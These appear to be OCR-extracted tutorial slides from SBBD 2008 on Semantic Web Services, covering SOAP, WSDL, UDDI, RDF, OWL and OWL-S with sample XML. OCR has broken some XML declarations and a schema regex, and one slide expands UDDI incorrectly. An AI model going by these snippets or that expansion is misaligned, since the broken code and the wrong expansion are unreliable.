null], [55066, 55552, null], [55552, 55552, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 55552, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 55552, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 55552, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 55552, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 55552, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 55552, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 55552, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 55552, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 55552, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 55552, null]], "pdf_page_numbers": [[0, 0, 1], [0, 0, 2], [0, 3279, 3], [3279, 3699, 4], [3699, 4280, 5], [4280, 5269, 6], [5269, 5847, 7], [5847, 6365, 8], [6365, 7344, 9], [7344, 9113, 10], [9113, 9189, 11], [9189, 11152, 12], [11152, 13430, 13], [13430, 14254, 14], [14254, 14728, 15], [14728, 16986, 16], [16986, 18325, 17], [18325, 19628, 18], [19628, 21090, 19], [21090, 21424, 20], [21424, 22673, 21], [22673, 24981, 22], [24981, 25426, 23], [25426, 25679, 24], [25679, 26165, 25], [26165, 26347, 26], [26347, 26470, 27], [26470, 27048, 28], [27048, 27809, 29], [27809, 28479, 30], [28479, 28955, 31], [28955, 29270, 32], [29270, 29437, 33], [29437, 29639, 34], [29639, 29886, 35], [29886, 30671, 36], [30671, 31492, 37], [31492, 32418, 38], [32418, 32914, 39], [32914, 33646, 40], [33646, 36101, 41], [36101, 36700, 42], [36700, 36901, 43], [36901, 39412, 44], [39412, 40665, 45], [40665, 42130, 46], [42130, 44182, 47], [44182, 47024, 48], [47024, 49103, 49], [49103, 51700, 50], [51700, 53367, 51], [53367, 53367, 52], [53367, 53530, 53], [53530, 55066, 54], [55066, 55552, 55], [55552, 55552, 56]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 55552, 0.22878]]}
olmocr_science_pdfs
2024-12-11
2024-12-11
ab12b6e00e3f3e307f8a1a8890d43b7bb0ff07f2
Semantic Web Services SBBD 2008 Renato Fileto Frank Siqueira Collaborators (SWS tools selection): Giorgio Merize Rodrigo Zeferino {fileto|frank|giorgio|rodrigo.zeferino}@inf.ufsc.br INE/CTC/UFSC Topics - **Introduction** - Web Services (WS) - Semantic Web (SW) - Semantic Web Services (SWS) - Some Major Efforts towards SWS - WSDL-S - OWL-S - SWSF (SWSO + SWSL) - WSMO (WSMO + WSML + WSMX) - **Software Tools:** WSMT, WSMX, IRS-III, ... - **Case study:** Travelling to SBBD Introduction Web Services Technology (discovery, selection, composition, and web-based execution of services) + Semantic Web (ontologies and machine supported data interpretation) = Semantic Web Services (integrated solution for realizing the vision of the next generation of the Web) The Web - The Web was initially designed for application to human interactions - Served very well its purpose: ◆ Information sharing: a distributed content library. ◆ Enabled B2C e-commerce. ◆ Non-automated B2B interactions. - How did it happen? ◆ Built on standards: HTTP, HTML, URI, ... ◆ Very few assumptions made about computing platforms. ◆ Ubiquity. What’s next? - The Web is everywhere. There is a lot more we can do! - E-marketplaces. - Open, automated B2B e-commerce. - Business process integration on the Web. - Resource sharing, distributed computing. - Current approach is *ad-hoc* on top of existing standards. - e.g., application-to-application interactions with HTML forms. - **Goal:** enabling systematic and automated application-to-application interaction on the Web. W3C’s Protocol Working Group “...the Web can grow significantly in power and scope if it is extended to support [automated] communication between applications, from one program to another.” W3C’s Protocol Woking Group Topics - Introduction - **Web Services (WS)** - Semantic Web (SW) - Semantic Web Services (SWS) - Some Major Efforts towards SWS - WSDL-S - OWL-S - SWSF (SWSO + SWSL) - WSMO (WSMO + WSML + WSMX) - **Software Tools:** WSMT, WSMX, IRS-III, ... - **Case study:** Travelling to SBBD Web Services - Encapsulated, loosely coupled Web “components” that can bind dynamically to each other. - Services are programmatically accessible over standard Internet protocols A Web Service - Identified by an URI - Self-describing and openly accessible - Can be remotely invoked through a well-defined interface - Exchanges data in XML format - Interacts with applications and other services via messages exchange (HTTP/SMTP) - Independent from other services and applications, but can cooperate with them Web Service Architecture Based on the Service Oriented Architecture (SOA) Obviously, there are other technologies for doing this Web services standardize connections, enabling “plug and play” on the Web. Web Service Objectives - Universal interoperability - Exploit ubiquity of the Web - Enable dynamic binding - Efficiently support open environment (Web) and more restrict environments if necessary - Minimize incompatibility costs - programming languages, - operating systems, - network protocols. An effort towards building a distributed computing platform on the Web. Why Web Services? - Based on generally accepted standards - Require little additional infrastructure - Loose coupling - Focus in messages and documents, not *APIs* - Easy to use - Complement existing technologies - Interoperability - Everybody use, have plans to use or is forced to use Technology Evolution Granularity, Coupling & Abstraction High Abstraction Low Abstraction Fine grained Coarse grained High Coupling Low Coupling Web Services Framework - What goes “on the wire”: Formats and protocols. - What describes what goes on the wire: Description languages. - How to find the services we need: Discovery and selection of services. - How to assemble and control the execution of services in processes on the Web: Composition of services. Current Web Services Technologies - Standards for publication, invocation & search - Unicode, URI + namespaces - XML (eXtensible Markup Language) + XML-Schema - SOAP (f.k.a. Simple Object Access Protocol) - WSDL (Web Services Definition Language) - UDDI (Unified Data Description and Interchange) - Implementation technologies - .NET (Microsoft) - Java Technology for Web Services (SUN) - ... and many others. Web Service Interaction 1. Registers Service 2. Service Discovery 3. Gets Service URI 4. Asks for Description 5. Gets WSDL 6. Invokes Service 7. Gets Response (optional) Current Web Services Standards - Cooperative Processes - Semantic Web Services - UDDI - WSDL - SOAP - Internet Protocols (HTTP) - XML + XML-Schema - URI + NameSpaces - Character Encoding (Unicode) Access Control & Security Policies Characters Encoding - `<xml encoding='UTF-8'>` - `<xml encoding='UTF-16'>` - `<xml encoding='EUC-JP'>` - `<xml version="1.0" encoding='ISO-8859-1'>` URI (Uniform Resource Identifier) An URI identifies an abstract or physical resource URNs (Uniform Resource Names) URLs (Uniform Resource Locators) Examples: ftp://ftp.is.co.za/rfc/rfc1808.txt http://www.ietf.org/rfc/rfc2396.txt mailto:John.Doe@example.com news:comp.infosystems.www.servers.unix ldap://[2001:db8::7]/c=GB?objectClass?one telnet://192.0.2.16:80/ tel: +1-816-555-1212 NameSpaces - `<x xmlns:edi="http://ecommerce.org/schema">` <!-- the "edi" prefix is bound to http://ecommerce.org/schema for the "x" element and contents --> </x> `<title>Cheaper by the Dozen</title>` `<isbn:number>1568491379</isbn:number>` </book> - `<schema xmlns="http://www.w3.org/2001/XMLSchema">` `<schema>` XML – eXtensible Makup Language - `<xml version="1.0"?>` `<!DOCTYPE people SYSTEM "http://www.wsno.org/workinggroup.dtd">` `<!−− This XML document gives information about working group members of the WSMO working group −−>` `<people xmlns="http://www.wsno.org/namespace">` `<title>WSMO working group members</title>` `<member chair="yes">` `<firstname>Dieter</firstname><lastname>Fensel</lastname>` `<affiliation>DERI International</affiliation>` </member>` `<member chair="yes">` `<firstname>John</firstname><lastname>Domingue</lastname>` `<affiliation>Open University</affiliation>` </member>` `<member>` `<firstname>Axel</firstname><lastname>Polleres</lastname>` `<affiliation>Univ. Rey Juan Carlos</affiliation>` </member>` `⋯` </people>` **DTD** ```xml <!DOCTYPE people [ <!ELEMENT people (title,member+)> <!ELEMENT member (firstname,lastname,affiliation+)> <!ATTLIST member chair (yes|no) "no"/> <!ELEMENT title (#PCDATA)> <!ELEMENT firstname (#PCDATA)> <!ELEMENT lastname (#PCDATA)> <!ELEMENT affiliation (#PCDATA)> ]> ``` **XML-Schema** An *XML-Schema* document describes: - elements, - attributes, - relationships, - etc. that can be used in one or more XML documents, i.e., defines a class of XML documents that follow a set of structural and data constraints - *XML-Schema* uses the *XML* syntax - *XML-Schema* is more robust, versatile and powerful than *DTD* (*Document Type Definition*) XML-Schema (example) ```xml <xml version="1.0" encoding="UTF-8"?> <xs:schema xmlns="http://www.wsmo.org/namespace" xmlns:xs="http://www.w3.org/2001/XMLSchema" elementFormDefault="qualified" attributeFormDefault="qualified" targetNamespace="http://www.wsmo.org/namespace"> <xs:element name="people"> <xs:complexType> <xs:sequence> <xs:element name="firstname" type="namestring" minOccurs="1" maxOccurs="2"/> <xs:element name="lastname" type="namestring" minOccurs="1" maxOccurs="2"/> <xs:element name="affiliation" type="namestring" maxOccurs="unbounded"/> </xs:sequence> </xs:complexType> </xs:element> </xs:schema> ``` XML-Schema (example cont) ```xml <xs:complexType name="person"> <xs:sequence> <xs:element name="firstname" type="namestring" minOccurs="1" maxOccurs="2"/> <xs:element name="lastname" type="namestring" minOccurs="1" maxOccurs="2"/> <xs:element name="affiliation" type="namestring" maxOccurs="unbounded"/> </xs:sequence> <xs:attribute name="chair" default="no"> <xs:simpleType> <xs:restriction base="xs:string"> <xs:enumeration value="yes"/> <xs:enumeration value="no"/> </xs:restriction> </xs:simpleType> </xs:attribute> </xs:complexType> ``` XML-Schema (example cont) ```xml <xs:simpleType name="namestring"> <xs:restriction base="xs:string"> <!-- This pattern says that names are strings starting with an uppercase letter --> <xs:pattern value="^[p]\{Lu\}\.*"/> </xs:restriction> </xs:simpleType> ``` Validating XML Documents - **Well-formed document**: satisfies the restrictions expressed in the XML specification (http://www.w3.org/TR/2004/REC-xml-20040204) - **Valid document**: satisfies the restrictions expressed in a schema specification (valid elements, attributes, nesting, etc.) written in DTD or XSL associated to the XML document Request example ```xml <?xml version="1.0" encoding="UTF-8"?> <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"> <S:Header/> <S:Body xmlns:ns1="http://ufsc.br/previsao"> <ns1:getMinTemperature> <location>Florianópolis</location> </ns1:getMinTemperature> </S:Body> </S:Envelope> ``` **SOAP** - **Return example** ```xml <?xml version="1.0" encoding="UTF-8"?> <S:Envelope xmlns:S="http://schemas.xmlsoap.org/soap/envelope/"> <S:Body> <ns1:getMinTemperatureResponse xmlns:ns1="http://ufsc.br/previsao"> <return>13.2</return> </ns1:getMinTemperatureResponse> </S:Body> </S:Envelope> ``` **SOAP + attachments** MIME-Version: 1.0 Content-Type: Multipart/Related; boundary=MIME_boundary; type=text/xml; start="<soapmsg.xml@example.com>" --MIME_boundary Content-Type: text/xml; charset=UTF-8 Content-Transfer-Encoding: 8bit Content-ID: soapmsg.xml@example.com ```xml <SOAP-ENV:Body> <Person> <Picture href="http://example.com/myPict.jpg" /> </Person> </SOAP-ENV:Body> </SOAP-ENV:Envelope> --MIME_boundary-- ``` WSDL - Web Services Description Language - Language for describing Web services - W3C Standard - XML based - Describes the interface of a Web service - Equivalent to Corba IDL description - Platform independent description - Extensible language - A de facto industry standard. Using WSDL - Allows tools to generate compatible client and server stubs. - Allows industries to define standardized service interfaces. - Allows advertisement of service descriptions, enabling dynamic discovery and binding of compatible services. - Provides a normalized description of heterogeneous applications. WSDL Structure - **portType** - Abstract definition of a service (set of operations) - **Multiple bindings per portType:** - How to access it - SOAP, JMS, direct call - **Ports** - Where to access it WSDL elements - **Types:** type definitions using *XML-Schema* - **Messages:** describes what goes on the data flows, using the types defined using *XML-Schema* - **Port types:** collections of related operations, using messages to exchange arguments and results - **Bindings:** associate port types with protocols (e.g., HTTP GET/POST) and data formats - **Ports:** associate bindings with network addresses - **Services:** collection of related ports Example: Shopping Cart WSDL definitions ```xml <definitions name="ShoppingCartDefinitions" targetNamespace="http://example.com/ShoppingCart.wsdl" xmlns:tns="http://example.com/ShoppingCart.wsdl" xmlns:xsd1="http://example.com/ShoppingCart.xsd" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns="http://schemas.xmlsoap.org/wsdl/"> ``` A WSDL document ```xml <definitions name="ShoppingCartDefinitions" xmlns="http://schemas/xmlsoap.org/wsdl" targetNamespace="http://example.com/ShoppingCart.wsdl" … > <types> … </types> <message name="AddItemInput"> … </message> <message name="AddItemOutput"> … </message> <portType name="ShoppingCart"> … </portType> <binding name="CartHTTPXMLBinding" type="tns:ShoppingCart">… <binding name="CartSOAPBinding" type="tns:ShoppingCart">… <service name="ShoppingCartService"> <port name="HTTPXMLCart" binding="tns:CartHTTPXMLBinding"> … <port name="SOAPCart" binding="tns:CartSOAPBinding"> … </service> <import namespace="..." location="..."> </definitions> ``` Types ```xml <types> <schema targetNamespace="http://myservice.net/carttypes" xmlns="http://www.w3.org/2000/10/XMLSchema"> <complexType name="item"><all> <element name="description" type="xsd:string"/> <element name="quantity" type="xsd:integer"/> <element name="price" type="xsd:float"/> </all></complexType> </schema> </types> ``` **Messages** ```xml <message name="AddItemInput"> <part name="cart-id" type="xsd:string"/> <part name="item" type="carttypes:item"/> <part name="image" type="xsd:base64Binary"/> </message> ``` **Port Types** ```xml <portType name="ShoppingCart"> <operation name="AddItem"> <input message="tns:AddItemInput"/> <output message="tns:ACK"/> <fault name="BadCartID" message="tns:BadCartID"/> <fault name="ServiceDown" message="tns:ServiceDown"/> </operation> <operation name="RemoveItem"/> <operation name="ListItems"/> </portType> ``` **SOAP Binding** ```xml <binding name="CartHTTPSOAPBinding" type="tns:ShoppingCart"> <soap:binding style="RPC" transport="http://schemas.xmlsoap.org/soap/http"/> <operation name="AddItem"> <soap:operation soapAction="http://myservice.net/cart/AddItem"/> <input> <soap:body use="encoded" namespace="http://myservice.net/cart" encodingStyle="http://schemas.xmlsoap.org/soap/encoding"/> </input> <output> <soap:body use="encoded" namespace="http://myservice.net/cart" encodingStyle="http://schemas.xmlsoap.org/soap/encoding"/> </output> <fault name="BadCartID"> <soap:body use="encoded" namespace="http://myservice.net/cart" encodingStyle="http://schemas.xmlsoap.org/soap/encoding"/> </fault> <fault name="ServiceDown"> <soap:body use="encoded" namespace="http://myservice.net/cart" encodingStyle="http://schemas.xmlsoap.org/soap/encoding"/> </fault> </operation> </binding> ``` **HTTP Binding** ```xml <binding name="CartHTTPPostBinding" type="tns:ShoppingCart"> <http:binding verb="POST"/> <operation name="AddItem"> <http:operation location="/AddItem"/> <input> <mime:content type="application/x-www-form-urlencoded"/> </input> <output> <mime:content type="application/x-www-form-urlencoded"/> </output> <fault name="BadCartID"> <mime:mimeXML/> </fault> <fault name="ServiceDown"> <mime:content type="application/x-www-form-urlencoded"/> </fault> </operation> </binding> ``` Ports <port name="SOAPCart" binding="tns:SOAPCartBinding"> <soap:address location="http://myservice.net/soap/cart"/> </port> <port name="HTTPPostCart" binding="tns:HTTPPostCartBinding"> <http:address location="http://myservice.net/cart"/> </port> Services <service name="ShoppingCartService"> <documentation>A Shopping Cart for the Web</documentation> <port name="HTTPPostCart" binding="tns:HTTPPostCartBinding"> <http:address location="http://myservice.net/cart"/> </port> <port name="SOAPCart" binding="tns:SOAPCartBinding"> <soap:address location="http://myservice.net/soap/cart"/> </port> </service> UDDI - Defines the operation of a service registry: - Data structures for registering - Businesses - Technical specifications: tModel is a keyed reference to a technical specification. - Service and service endpoints: referencing the supported tModels - SOAP Access API - Rules for the operation of a global registry - “private” UDDI nodes are likely to appear, though. UDDI Basic Structure References to Taxonomies - businessEntity - XY323eS472384wZ2f3100293 - Harbour Flowers - www.harbourflowersltd.co.au - "Serving Inner Sydney Harbour for ..." - contacts - businessServices - identifierBag - keyedReference - EE123 - NAICS 02417 - keyedReference - DFE-2B - DUNS 45231 - Peter Smythe - 872-6651 - 4281 King's Blvd, Sydney, NSW - Petersmythe22@hotmail.com - businessService - 23701e54683nf... - Online catalog - "Website where you can ..." - BindingTemplates - BindingTemplate - 352041263-44EE... - http://www.sydneynet/hamour... - tModelInstanceDetails - tModelInstanceInfo - 4453DFC-223C-3ED6... - tModel References, each with a unique identifier --- API SOAP para o UDDI **API de consulta** - Busca - find_business - find_service - find_binding - find_tModel - Consulta a detalhes - get_businessDetail - get_serviceDetail - get_bindingDetail - get_tModelDetail **API de publicação** - Adição - save_business - save_service - save_binding - save_tModel - Remoção - delete_business - delete_service - delete_binding - delete_tModel - Segurança - get_authToken - discard_authToken Major Challenges in Web Services - **Discovery**: find available resource in the Web to meet specific needs - **Selection**: choose the most suitable resources, by several criteria (e.g., cost, matching interfaces) - **Composition**: design, enact and synchronize (“choreograph”) distributed processes on the Web, using Web services as basic building blocks Topics - Introduction - Web Services (WS) - Semantic Web (SW) - Semantic Web Services (SWS) - Some Major Efforts towards SWS - WSDL-S - OWL-S - SWSF (SWSO + SWSL) - WSMO (WSMO + WSML + WSMX) - Software Tools: WSMT, WSMX, IRS-III, ... - Case study: Travelling to SBBD WS standards lack of semantics! Problem: No way to describe services and data semantics for machine processing in order to support automated service discovery, selection, composition, ... Deficiencies of WS Technology - Only syntactical information descriptions and syntactic support for discovery, composition and execution => *Web Service reuse and integration needs to be done manually* - No semantic markup for contents / services => *Current Web Service Technology Stack failed to realize the promise of Web Services* The Semantic Web "*The Semantic Web is an extension of the current Web in which information is given well-defined meaning, better enabling computers and people to work in cooperation.*" Means: - Standards for representing data and metadata - Semantic descriptions attached to data and services - Reasoning (e.g., inference) based on semantic descriptions Ontology in Philosophy - **From Greek:** - Ontos = being, logos = science - **Shared understanding** of some domain of interest which - Conceived as a set of concepts (e.g., entities, attributes, processes), their definitions and inter-relationships. - Referred to as a conceptualization. - May be used as a unifying framework to solve the above problems in the above described manner. - Entails some sort of world view [with respect to a given domain]. Ontologies in Computer Science - **Shared conceptualizations** of a domain - **Explicit** and **Formal** to enable its use by machines - Can have different forms: - **Thesaurus** with the semantic relationships between terms (e.g., synonym, holonym (IS_A), meronym (PART_OF)) - **Taxonomy** - **Class Diagram** - **Knowledge Base** - Classes, properties and their relationships - Instances of classes Ontology Example – Trip Applications - **Accurate search of resources** Ex.: Student(Mary), Model(Mary), Saint(Mary) - **Interoperability** - **Intelligent agents** - **Reuse and composition of resources** - **Semantically enabled services & workflows** Semantic Web Standards (2006) User Interface & Applications Trust Proof Unifying Logic Ontology: OWL Rule: RIF SparQL RDF-S RDF XML URI/IRI Semantic Heterogeneity in XML <object id="a1" class="artifact"> <tuple> <title>Nymphes</title> <year>1897</year> <creator>Monet</creator> <price>10,000,000</price> <owners refs="p1,p2,p3"/> </tuple> </object> <object id="p3" class="person"> <tuple> <name>Claudia</name> <age>17</age> </tuple> </object> <work> <artist>Monet</artist> <name>Nymphes</name> <style>Impressionist</style> <size>21 x 61</size> <cplace>Givern</cplace> </work> <work> <artist>Monet</artist> <title>Waterloo Bridge</title> <style>Impressionist</style> <size>29.2 x 46.4</size> <history> Painted with <tech>Oil on canvas</tech> in... </history> </work> XML as a Standard Data Model ODMG Model | Class: class | Type: V (int v bool v float v string) | | YAT: &YAT V Any | | artifacts: set | &Artifact | | &Artifact | | tuple | | &Person | “Artfact” Schema “Artworks” Structure RDF – Resource Description Framework A standard language & model for expressing semantics on the Semantic Web. An RDF statement is a triple of the form: - **Resource**: anything that has a URL - **Property**: any property of the resource - **Value**: a literal or another resource RDF-Schema defines the classes of resources, the possible properties for each class of resource, and the possible values for these properties. The proposed standard formats for representing ontologies on the Semantic Web (e.g., DAML+OIL, OWL) are extensions of RDF. RDF’s XML Syntax ```xml <?xml version="1.0"?> <rdf:RDF xmlns:RDF="http://www.w3.org/RDF/RDF/ xmlns:dc="http://dublincore.org/dc"> <rdf:Description about="http://www.nbi.cnptia.embrapa.br"> <dc:name>Núcleo de Bioinformática</dc:name> <leader> rdf:resource="http://www.cbi.cnptia.embrapa.br/~neshich" </leader> </rdf:Description> <rdf:Description about="http://www.nbi.cnptia.embrapa.br/~neshich"> <dc:name>Goran Neshich</dc:name> <title>Dr.</title> <dc:email>neshich@cnptia.embrapa.br</dc:email> </rdf:Description> </rdf:RDF> ``` RDF graph-like structure Metadata in RDF Water Balance (same place and institution) ```xml <?xml version="1.0"?> <rdf:RDF xmlns:RDF="http://www.w3.org/RDF/RDF/" xmlns="http://agric.gov.br/DocStd/" > <rdf:Description about="http://www.agric.gov.br/public/WaterBal1234"> <Source> rdf:resource="http://www.cepagri.unicamp.br" rdf:resource="http://www.ciagro.iac.gov.sp.br" </Source> <InitialDate>28/03/2002</InitialDate> <FinalDate>31/03/2002</FinalDate> <keyword>Water available in Soil</keyword> <local> rdf:resource="http://www.ibge.gov.br/state_SP" </local> <measuremnt_unit> rdf:resource="http://www.inmetro.gov.br/mm" </measuremnt_unit> </rdf:Description> </rdf:RDF> ``` <rdf:Property rdf:about="&AgricZoning;countryOfState" a:maxCardinality="1" a:minCardinality="1" rdfs:label="countryOfState"> <rdfs:domain rdf:resource="&AgricZoning;State"/> <rdfs:range rdf:resource="&AgricZoning;Country"/> <a:inverseProperty rdf:resource="&AgricZoning;statesOfCountry"/> </rdf:Property> RDF-Schema <RDF-Schema> <rdf:Property rdf:about="&AgricZoning;statesOfCountry" a:minCardinality="1" rdfs:label="statesOfCountry"> <rdfs:domain rdf:resource="&AgricZoning;Country"/> <rdfs:range rdf:resource="&AgricZoning;State"/> <a:inverseProperty rdf:resource="&AgricZoning;countryOfState"/> </rdf:Property> </RDF-Schema> One RDF instance ```xml <AgricZoning:Country rdf:about="&AgricZoning;pais_55" AgricZoning:nameBR="BRASIL" rdfs:label="BRASIL"> <AgricZoning:officialRegionsOfCountry rdf:resource="&AgricZoning;regof_1"/> <AgricZoning:officialRegionsOfCountry rdf:resource="&AgricZoning;regof_2"/> <AgricZoning:officialRegionsOfCountry rdf:resource="&AgricZoning;regof_3"/> <AgricZoning:officialRegionsOfCountry rdf:resource="&AgricZoning;regof_4"/> <AgricZoning:officialRegionsOfCountry rdf:resource="&AgricZoning;regof_5"/> <AgricZoning:statesOfCountry rdf:resource="&AgricZoning;estado_11"/> <AgricZoning:statesOfCountry rdf:resource="&AgricZoning;estado_12"/> <AgricZoning:metroAreasOfCountry rdf:resource="&AgricZoning;metro_5201"/> </AgricZoning:Country> ``` RDF-Schema to provide Alternative Knowledge Views **OWL – Ontology Web Language** - Extends the RDF with standard vocabulary and constructs to define: - Local scope of properties - Disjointness of classes - Boolean combinations of classes - Cardinality restrictions - Special characteristics of properties (e.g., transitive properties, inverted properties) **The 3 flavours of OWL** - **OWL Lite** - Restricted expressiveness: excludes enumerated classes, disjointness statements, and arbitrary cardinality - Easier to grasp and implement - **OWL DL** - Equivalent to Description Logics - Still permits efficient reasoning support - Every legal OWL DL document is a legal RDF document (but not the inverse) - **OWL Full** - Fully upward-compatible with RDF, both syntactically and semantically - Any valid RDF/RDF Schema conclusion is also a valid OWL Full conclusion - Undecidable Disjunction and Equivalence of Classes <owl:Class rdf:about="#associateProfessor"> <owl:disjointWith rdf:resource="#professor"/> <owl:disjointWith rdf:resource="#assistantProfessor"/> </owl:Class> <owl:Class rdf:ID="faculty"> <owl:equivalentClass rdf:resource="#academicStaffMember"/> </owl:Class> Inverse properties <owl:ObjectProperty rdf:ID="teaches"> <rdfs:range rdf:resource="#course"/> <rdfs:domain rdf:resource="#academicStaffMember"/> <owl:inverseOf rdf:resource="#isTaughtBy"/> </owl:ObjectProperty> Abstract OWL Syntax Class(Person partial restriction (hasChild allValuesFrom(Person))) Class(Parent complete Person restriction (hasChild someValuesFrom(Person))) ObjectProperty(hasChild) Individual (John type(Person) value(hasChild Mary)) Rule Languages Rules: - father(?x, ?z) v mother(?x, ?z) ⇒ parent(?x, ?z) - parent(?x, ?z) ∧ parent(?y, ?z) ⇒ brother(?x, ?y) Knowledge base: - father(_Fileto, _Claudio) - father(_Guiga, _Claudio) Query: - brother(_Fileto, ?b) ⇒ Yes !! ⇒ ?b = _Guiga ⇒ ?b = _xyz1, _xyz2, _xyz3, _xyz4, ... SPARQL W3C recommendation for querying RDF repositories Exemplo de expressão em SPARQL: ```sparql SELECT ?concept, ?property, "Mary" WHERE { ?concept property:hasProperty ?property FILTER(?property, "name") } ``` Research Challenges in the Semantic Web - **Ontology Creation and Management** - (Semi)-Automated Ontology Building (+) - (Semi)-Automated Semantic Annotation (+) - (Semi)-Automated Ontology Evolution (+/-) - Reasoning with Inconsistent Ontologies (-) - Ontology Mapping, Mediation and Alignment (+) - **Ontology Use** - Ontologies for Knowledge Management (+/-) - Semantic IR / Search (++) - Semantic Web Services (++ -> future) - **Tools and Application (++)** Topics - Introduction - Web Services (WS) - Semantic Web (SW) **Semantic Web Services (SWS)** - Some Major Efforts towards SWS - WSDL-S - OWL-S - SWSF (SWSO + SWSL) - WSMO (WSMO + WSML + WSMX) - **Software Tools**: WSMT, WSMX, IRS-III, ... - **Case study**: Travelling to SBBD Semantic Web & Web Services The SWS Vision - Huge in terms of users and information available - Ubiquitous WWW URI, HTML, HTTP Deficiencies in Automated Information Processing - finding - extraction - representation - interpretation - maintenance WWW URI, HTML, HTTP Semantic Web RDF, RDF(S), OWL The SWS Vision Dynamic Web Services UDDI, WSDL, SOAP Enable Computing over the Web WWW URI, HTML, HTTP Semantic Web RDF, RDF(S), OWL Static Syntactic Semantic The SWS Vision Dynamic Automated Web services using Bringing the Web to its full potential Web Services UDDI, WSDL, SOAP Semantic Web Services Semantic Web RDF, RDF(S), OWL Semantic description of Web Services - Should describe all information necessary to enable automated discovery, composition, execution, etc. - Semantically enhanced repositories - Tools and platforms that: - semantically enrich current Web content - facilitate discovery, composition and execution Semantic Web Services - define exhaustive description frameworks for describing Web Services and related aspects (Web Service Description Ontologies) - support ontologies as underlying data model to allow machine supported Web data interpretation (Semantic Web aspect) - define semantically driven technologies for automation of the Web Service usage process (Web Service aspect) What (partial) automation should SWS provide? - **Publication**: Make available the description of the capability of a service - **Discovery**: Locate different services suitable for a given task - **Selection**: Choose the most appropriate services among the available ones - **Composition**: Combine services to achieve a goal - **Mediation**: Solve mismatches (data, protocol, process) among the combined - **Execution**: Invoke services following programmatic conventions - **Monitoring**: Control the execution process - **Compensation**: Provide transactional support and undo or mitigate unwanted effects - **Replacement**: Facilitate the substitution of services by equivalent ones Topics - **Introduction** - **Web Services (WS)** - **Semantic Web (SW)** - **Semantic Web Services (SWS)** **Some Major Efforts towards SWS** - WSDL-S - OWL-S - SWSF (SWSO + SWSL) - WSMO (WSMO + WSML + WSMX) - **Software Tools**: WSMT, WSMX, IRS-III, ... - **Case study**: Travelling to SBBD Some Major SWS Proposals - **WSDL-S**: extends **WS** technology with semantic descriptions - **OWL-S**: extends **OWL** for semantically describing **WS** - **SWSF (SWSO + SWSL)**: roots in **OWL-S** and the **PSL** (Process Specification Language) - **WSMO (WSMO + WSML + WSMX)**: ontologies, Web services, **goals**, and **mediators** WSDL-S - Rather **minimalist and lightweight** approach that extends **WSDL** service descriptions with semantics - Roots on METEOR-S project, from **Amit Sheth** at LSDIS, Athens, Georgia - The semantic model is outside WSDL-S, making it impartial to ontology representation language - Builds upon and stays close to existing industry standards, promoting an upwardly compatible mechanism for adding semantics to Web services - Support for XML Schema datatype annotations needs to be added to XML-Schema - Originates of **SAWSDL** (Semantic Annotations for WSDL), W3C's recommendation with IBM **WSDL-S** OWL-S is an OWL ontology to describe Web services. OWL-S leverages on OWL to: - Support capability based discovery of Web services - Support automatic composition of Web Services - Support automatic invocation of Web services "Complete do not compete" - OWL-S does not aim to replace the Web services standards rather OWL-S attempts to provide a semantic layer - OWL-S relies on WSDL for Web service invocation (see Grounding) - OWL-S Expands UDDI for Web service discovery (OWL-S/UDDI mapping) OWL-S Upper Ontology - Mapping to WSDL - communication protocol (RPC, HTTP, ...) - marshalling/serialization - transformation to and from XSD to OWL - Capability specification - General features of the Service - Quality of Service - Classification in Service taxonomies - Control flow of the service - Black/Grey/Glass Box view - Protocol Specification - Abstract Messages Service Profiles - Service Profile - Presented by a service. - Represents what the service provides - Two main uses: 1. Advertisements of Web Services capabilities (non-functional properties, QoS, Description, classification, etc.) 2. Request of Web services with a given set of capabilities - Profile does not specify use/invocation! OWL-S Service Profile Capability Description - **Preconditions** - Set of conditions that should hold prior to service invocation - **Inputs** - Set of necessary inputs that the requester should provide to invoke the service - **Outputs** - Results that the requester should expect after interaction with the service provider is completed - **Effects** - Set of statements that should hold true if the service is invoked successfully. - **Service type** - What kind of service is provided (e.g., selling vs. distribution) - **Product** - Product associated with the service (e.g., travel vs. books vs auto parts) --- Process Model - **Process Model** - Describes how a service works: internal processes of the service - Specifies service interaction protocol - Specifies abstract messages: ontological type of information transmitted - **Facilitates** - Web service invocation - Composition of Web services - Monitoring of interaction **Definition of Process** A Process represents a transformation (function). It is characterized by four parameters: - **Inputs**: the inputs that the process requires - **Preconditions**: the conditions that are required for the process to run correctly - **Outputs**: the information that results from (and is returned from) the execution of the process - **Results**: a process may have different outcomes depending on some condition - **Condition**: under what condition the result occurs - **Constraints on Outputs - **Effects**: real world changes resulting from the execution of the process **Example of an atomic Process** ```xml <process:AtomicProcess rdf:ID="LogIn"> <process:hasInput rdf:resource="#AcctName"/> <process:hasInput rdf:resource="#Password"/> <process:hasOutput rdf:resource="#Ack"/> <process:hasPrecondition isMember(AccName)/> <process:hasResult> <process:inCondition> <expr:SWRL-Condition> correctLoginInfo(AccName,Password) </expr:SWRL-Condition> </process:inCondition> <process:withOutput rdf:resource="#Ack"/> <valueType rdf:resource="#LoginAcceptMsg"/> </process:hasResult> <process:hasEffect> <expr:SWRL-Condition> loggedIn(AccName,Password) </expr:SWRL-Condition> <process:withOutput rdf:resource="#Ack"/> <valueType rdf:resource="#LoginAcceptMsg"/> </process:hasEffect> </process:AtomicProcess>``` Ontology of Processes Process Model Organization - **Process Model is described as a tree structure** - Composite processes are internal nodes - Simple and Atomic Processes are the leaves - **Simple processes represent an abstraction** - Placeholders of processes that aren’t specified - Or that may be expressed in many different ways - **Atomic Processes correspond to the basic actions that the Web service performs** - Hide the details of how the process is implemented - Correspond to WSDL operations ~ related Process Definition Languages a la 